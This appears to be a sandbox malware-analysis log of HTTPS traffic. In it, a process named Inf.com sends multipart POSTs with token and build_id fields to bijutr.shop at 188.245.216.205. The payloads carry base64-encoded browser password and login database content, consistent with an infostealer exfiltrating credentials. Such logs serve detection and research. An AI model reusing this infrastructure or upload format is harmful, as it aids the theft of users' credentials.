                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:33 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                  Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:34 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  26192.168.2.549964188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----0Z58G4WLNYCJE3OHVAS0
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 262605
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 30 5a 35 38 47 34 57 4c 4e 59 43 4a 45 33 4f 48 56 41 53 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------0Z58G4WLNYCJE3OHVAS0Content-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------0Z58G4WLNYCJE3OHVAS0Cont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                  Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                  Date: Fri, 27 Dec 2024 06:01:37 GMT
                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                  27192.168.2.549972188.245.216.2054431276C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com
                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----L6XBI5FCBIEUAIEK6PPP
                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                  Host: bijutr.shop
                                                                                                                                                                                                                                                                                                  Content-Length: 393697
                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 64 32 36 63 35 34 32 31 38 37 62 31 62 64 38 66 66 61 32 38 31 32 30 66 30 62 33 62 38 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 38 36 30 35 36 39 34 34 35 32 30 37 66 31 31 39 38 66 33 31 32 37 61 32 65 30 64 34 61 32 39 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                  Data Ascii: ------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="token"a9d26c542187b1bd8ffa28120f0b3b8a------L6XBI5FCBIEUAIEK6PPPContent-Disposition: form-data; name="build_id"7860569445207f1198f3127a2e0d4a29------L6XBI5FCBIEUAIEK6PPPCont
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                  2024-12-27 06:01:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
